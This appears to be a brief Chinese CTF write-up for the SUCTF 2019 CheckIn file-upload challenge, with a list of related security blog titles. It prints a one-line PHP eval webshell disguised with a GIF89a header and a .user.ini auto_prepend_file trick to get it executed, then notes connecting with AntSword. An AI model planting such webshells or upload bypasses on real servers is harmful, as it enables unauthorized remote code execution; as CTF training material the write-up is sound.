[SUCTF 2019]CheckIn 1

解题步骤

  1. 上传木马图片,命名为b.php
xml 复制代码
GIF89a
<script language='php'>@eval($_POST['cmd'])</script>
  1. bp抓包,修改数据;然后可看到上传的文件

  2. 上传.user.ini文件,内容编写如下,然后bp抓包修改文件类型

php 复制代码
GIF89a
auto_prepend_file=b.jpg


  1. 可发现,刚刚我们上传的木马b文件被删除了,这里我测试了几遍,只要速度够快,两个文件能够同时存在,能够用蚁剑连接。


相关推荐
hcja6664 小时前
WordPress wpForo Forum插件漏洞CVE-2025-11740复现
web安全·网络安全
kali-Myon4 小时前
NewStarCTF2025-Week4-Web
sql·安全·web安全·php·ctf·ssti·ssrf
Z3r4y4 小时前
【代码审计】RuoYi-3.0 三处安全问题分析
java·web安全·代码审计·ruoyi-3.0
安全不再安全6 小时前
免杀技巧 - 早鸟注入详细学习笔记
linux·windows·笔记·学习·测试工具·web安全·网络安全
挨踢攻城9 小时前
项目实战 | 新建校区网络安全项目:从搭建到交付
安全·web安全·公众号:厦门微思网络·华为网络安全项目·项目实战案例·网络安全项目·新建校区网络安全项目
AI分享猿11 小时前
免费WAF天花板!雷池WAF护跨境电商:企业级CC攻击防御,Apache无缝适配
爬虫·web安全
我就是一粒沙12 小时前
网络安全培训
网络·安全·web安全
安全系统学习13 小时前
自学网络安全学习的误区和陷阱
数据库·学习·安全·web安全·网络安全·安全架构
-曾牛19 小时前
网络安全常见的框架漏洞
安全·web安全·网络安全·渗透测试·文件包含·漏洞复现·框架漏洞
白帽子黑客杰哥19 小时前
湖湘杯网络安全技能大赛参与形式
数据库·web安全·渗透测试·安全演练·湖湘杯·实战演练